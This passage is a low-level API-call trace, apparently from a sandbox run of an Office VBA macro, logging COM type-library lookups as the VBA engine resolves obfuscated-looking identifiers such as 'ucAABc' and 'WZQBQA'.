pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.781] IUnknown:Release (This=0x665ba50) returned 0xb [0068.781] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.781] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ucAABc", lHashVal=0x10402d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.781] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.781] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.781] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ucAABc", lHashVal=0x10402d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.781] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.781] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.781] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ucAABc", lHashVal=0x10402d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.781] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60ba6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ucAABc") returned 7 [0068.781] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ucAABc", lHashVal=0x10402d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.781] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.781] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a60ba6 | out: _Dst=0x67c2d40) returned 0x0 [0068.781] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ucAABc") returned 0x10bad6 [0068.781] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_ucAABc" | out: _Dst="_B_var_ucAABc") returned 0x0 [0068.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_ucAABc") returned 14 [0068.781] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.781] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ucAABc", lHashVal=0x10bad6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.781] IUnknown:Release (This=0x665ba50) returned 0xb [0068.781] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.781] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ucAABc", lHashVal=0x10bad6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.781] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.781] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.781] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ucAABc", lHashVal=0x10bad6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.782] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.782] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.782] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ucAABc", lHashVal=0x10bad6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.782] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.782] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.782] IUnknown:Release (This=0x665ba50) returned 0xb [0068.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc247a, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_ucAABc") returned 14 [0068.782] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ucAABc", lHashVal=0x10bad6, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0) returned 0x0 [0068.782] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a60ba6 | out: _Dst=0x144ec0) returned 0x0 [0068.782] ITypeComp:RemoteBind (in: This=0x665ba60, szName="WZQBQA", lHashVal=0x10d539, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60bce, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="WZQBQA") returned 7 [0068.782] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="WZQBQA", lHashVal=0x10d539, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60bce, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="WZQBQA") returned 7 [0068.782] ITypeComp:RemoteBind (in: This=0x665bd30, szName="WZQBQA", lHashVal=0x10d539, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.782] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WZQBQA") returned 0x10d539 [0068.782] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="WZQBQA" | out: _Dst="WZQBQA") returned 0x0 [0068.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="WZQBQA") returned 7 [0068.782] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.782] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="WZQBQA", lHashVal=0x10d539, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.782] IUnknown:Release (This=0x665ba50) returned 0xb [0068.782] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.782] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="WZQBQA", lHashVal=0x10d539, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.782] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.782] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.782] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="WZQBQA", lHashVal=0x10d539, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.782] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.782] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.782] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="WZQBQA", lHashVal=0x10d539, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.782] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60bce, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="WZQBQA") returned 7 [0068.782] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="WZQBQA", lHashVal=0x10d539, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.783] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.783] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a60bce | out: _Dst=0x67c2d40) returned 0x0 [0068.783] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_WZQBQA") returned 0x104fa3 [0068.783] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_WZQBQA" | out: _Dst="_B_var_WZQBQA") returned 0x0 [0068.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_WZQBQA") returned 14 [0068.783] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.783] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_WZQBQA", lHashVal=0x104fa3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.783] IUnknown:Release (This=0x665ba50) returned 0xb [0068.783] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.783] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_WZQBQA", lHashVal=0x104fa3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.783] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.783] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.783] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_WZQBQA", lHashVal=0x104fa3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.783] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.783] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.783] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_WZQBQA", lHashVal=0x104fa3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.783] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.783] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.783] IUnknown:Release (This=0x665ba50) returned 0xb [0068.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc24aa, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_WZQBQA") returned 14 [0068.783] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_WZQBQA", lHashVal=0x104fa3, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x51004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x51004200000000, pDummy=0x0) returned 0x0 [0068.783] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a60bce | out: _Dst=0x144ec0) returned 0x0 [0068.783] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0068.783] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0068.783] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.783] IUnknown:Release (This=0x665ba50) returned 0xb [0068.783] IUnknown:AddRef (This=0xaf0b528) returned 0x4 [0068.783] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144db0 | out: ppvObject=0x144db0*=0x0) returned 0x80004002 [0068.783] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144d80 | out: ppvObject=0x144d80*=0x0) returned 0x80004002 [0068.784] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144d70 | out: ppvObject=0x144d70*=0x0) returned 0x80004002 [0068.784] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144d78 | out: ppvObject=0x144d78*=0x0) returned 0x80004002 [0068.784] ITypeInfo:RemoteGetTypeAttr (in: This=0xaf0b528, ppTypeAttr=0x144da8, pDummy=0x10 | out: ppTypeAttr=0x144da8, pDummy=0x10) returned 0x0 [0068.784] ITypeInfo:LocalReleaseTypeAttr (This=0xaf0b528) returned 0x0 [0068.784] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.784] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.784] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.784] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.784] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.784] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.784] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.784] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.784] IUnknown:Release (This=0x665ba50) returned 0xc [0068.784] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.784] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.784] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.784] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x200) returned 0xaf17520 [0068.784] IMalloc:Alloc (This=0x7fefec05380, cb=0x318) returned 0x272e3b0 [0068.784] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.784] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.784] IUnknown:AddRef (This=0x665ba50) returned 0xd [0068.784] IUnknown:Release (This=0x665ba50) returned 0xc [0068.784] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.784] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.784] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.784] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.784] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.784] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.784] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.784] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.784] IUnknown:Release (This=0x665ba50) returned 0xc [0068.784] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.785] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.785] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.785] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.785] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.785] IUnknown:AddRef (This=0x665ba50) returned 0xd [0068.785] IUnknown:Release (This=0x665ba50) returned 0xc [0068.785] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.785] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.785] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.785] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.785] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.785] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.785] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.785] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.785] IUnknown:Release (This=0x665ba50) returned 0xc [0068.785] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.785] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.785] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.785] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144db0 | out: ppvObject=0x144db0*=0x0) returned 0x80004002 [0068.785] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144d80 | out: ppvObject=0x144d80*=0x0) returned 0x80004002 [0068.785] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144d70 | out: ppvObject=0x144d70*=0x0) returned 0x80004002 [0068.785] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144d78 | out: ppvObject=0x144d78*=0x0) returned 0x80004002 [0068.785] ITypeInfo:RemoteGetTypeAttr (in: This=0xaf0b6e0, ppTypeAttr=0x144da8, pDummy=0x10 | out: ppTypeAttr=0x144da8, pDummy=0x10) returned 0x0 [0068.785] ITypeInfo:LocalReleaseTypeAttr (This=0xaf0b6e0) returned 0x0 [0068.785] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0068.785] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0068.786] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.786] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.786] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.786] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.786] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.786] IUnknown:Release (This=0x665ba50) returned 0xd [0068.786] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.786] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.786] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.786] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.786] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, 